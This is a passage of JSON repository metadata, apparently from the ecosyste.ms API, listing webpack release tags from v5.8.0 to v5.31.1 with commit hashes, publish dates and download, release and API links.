kg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},